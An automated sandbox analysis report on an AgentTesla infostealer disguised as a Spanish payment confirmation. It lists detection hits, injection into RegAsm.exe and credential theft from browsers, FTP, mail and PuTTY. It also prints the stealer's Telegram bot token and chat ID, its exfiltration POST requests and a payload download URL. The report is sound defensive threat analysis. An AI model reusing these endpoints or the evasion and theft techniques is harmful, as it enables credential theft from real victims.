
Windows Analysis Report
Confirmaci#U00f3n de pago_shrunk.exe

Overview

General Information

Sample name: Confirmaci#U00f3n de pago_shrunk.exe (renamed because original name is a hash value)
Original sample name: Confirmación de pago_shrunk.exe
Analysis ID: 1518505
MD5: 5f249a857aa4ec0d7811cbe49b1eac0e
SHA1: 9bc2fed4cf1f677c009ba9c0c224e15a07ee8dd4
SHA256: e97a53902ccc623ff61147e3b7cb7e9abf77e8a61a401a317891ffaf73a7338a
Tags: exeuser-malrpt

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Confirmaci#U00f3n de pago_shrunk.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe" MD5: 5F249A857AA4EC0D7811CBE49B1EAC0E)
    • RegAsm.exe (PID: 3780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"C2 url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage?chat_id=-4169421237"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(12 further entries not shown)

Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
2.2.RegAsm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x33340:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x333b2:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x3343c:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x334ce:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33538:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x335aa:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x33640:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x336d0:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(23 further entries not shown)
                      No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T18:51:27.695363+0200 | 2851779 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49705 | 149.154.167.220 | 443 | TCP
2024-09-25T18:51:27.695363+0200 | 2852815 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49705 | 149.154.167.220 | 443 | TCP
2024-09-25T18:51:27.696072+0200 | 2854281 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.8 | 49705 | TCP


AV Detection

Source: Confirmaci#U00f3n de pago_shrunk.exe | Avira: detected
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage?chat_id=-4169421237"}
Source: RegAsm.exe.3780.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendMessage"}
Source: Confirmaci#U00f3n de pago_shrunk.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Confirmaci#U00f3n de pago_shrunk.exe | Joe Sandbox ML: detected
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: CVNXGJKDF133.pdb | source: Confirmaci#U00f3n de pago_shrunk.exe

Networking

Source: Network traffic | Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.8:49705 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.8:49705 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.8:49705
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /cCoB5/anonymous.txt HTTP/1.1
    Host: transfer.adttemp.com.br
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3c
    Host: api.telegram.org
    Content-Length: 919
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /cCoB5/anonymous.txt HTTP/1.1
    Host: transfer.adttemp.com.br
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3c
    Host: api.telegram.org
    Content-Length: 919
    Expect: 100-continue
    Connection: Keep-Alive
Source: RegAsm.exe, 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://transfer.adttemp.com.br
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000003003000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://transfer.adttemp.com.brd
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: RegAsm.exe, 00000002.00000002.2696679944.0000000003146000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/
Source: RegAsm.exe, 00000002.00000002.2696679944.0000000003142000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://transfer.adttemp.com.br
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.0000000002F81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://transfer.adttemp.com.br/cCoB5/anonymous.txt
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49705 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, n00.cs | .Net Code: euczAUZox
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, n00.cs | .Net Code: euczAUZox
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, n00.cs | .Net Code: euczAUZox

System Summary

Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D68EB8
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D61252
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D61260
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Code function: 0_2_02D615B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030D9340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030D4A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030D9AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030D3E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030DCEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_030D4180
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460095411.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Confirmaci#U00f3n de pago_shrunk.exe
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000000.1436251809.0000000000B16000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs Confirmaci#U00f3n de pago_shrunk.exe
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename44e07c50-4c06-45cd-abce-a918ae461de5.exe4 vs Confirmaci#U00f3n de pago_shrunk.exe
Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460905643.00000000030F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename44e07c50-4c06-45cd-abce-a918ae461de5.exe4 vs Confirmaci#U00f3n de pago_shrunk.exe
Source: Confirmaci#U00f3n de pago_shrunk.exe | Binary or memory string: OriginalFilenameCVNXGJKDF133.exe: vs Confirmaci#U00f3n de pago_shrunk.exe
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Confirmaci#U00f3n de pago_shrunk.exe, buR3AKMBuXsg5ovOyf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs | Cryptographic APIs: 'CreateDecryptor'
Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs | Cryptographic APIs: 'CreateDecryptor'
Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirmaci#U00f3n de pago_shrunk.exe.log
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Confirmaci#U00f3n de pago_shrunk.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Confirmaci#U00f3n de pago_shrunk.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe "C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe"
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
